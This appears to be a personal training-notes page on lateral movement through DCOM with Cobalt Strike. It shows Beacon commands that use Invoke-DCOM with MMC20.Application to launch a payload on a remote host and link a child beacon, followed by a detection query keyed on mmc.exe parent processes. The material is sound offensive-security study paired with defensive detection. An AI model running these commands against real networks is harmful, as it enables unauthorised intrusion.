Secondary Categories: 02 - Lateral Movement Links: Beacon Object Files Component Object Model (COM) Search Tag:📕

Distributed Component Object Model (DCOM)

Description:

Cobalt Strike

Beacon has no built-in capabilities to interact over Distributed Component Object Model (DCOM), so we must use an external tool such as Invoke-DCOM. We’ll see in a later module how this can be integrated into the jump command.

beacon> powershell-import C:\Tools\Invoke-DCOM.ps1
beacon> powershell Invoke-DCOM -ComputerName web.dev.cyberbotic.io -Method MMC20.Application -Command C:\Windows\smb_x64.exe
Completed
 
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30

DCOM is more complicated to detect, since each “Method” works in a different way. In the particular case of MMC20.Application, the spawned process will be a child of mmc.exe.

event.category: process and event.type : start and process.parent.name: mmc.exe

Processes started via DCOM may also be observed where the parent is svchost.exe with command line arguments of -k DcomLaunch.

Resources:

Title	URL
place	holder

Created Date: November 17th 2022 23:26
Last Modified Date: November 17th 2022 23:26

The Void 🌌

Explorer

Distributed Component Object Model (DCOM)

Distributed Component Object Model (DCOM)

Description:

Cobalt Strike

Resources:

Graph View

Backlinks

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer

Explorer

Table of Contents

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer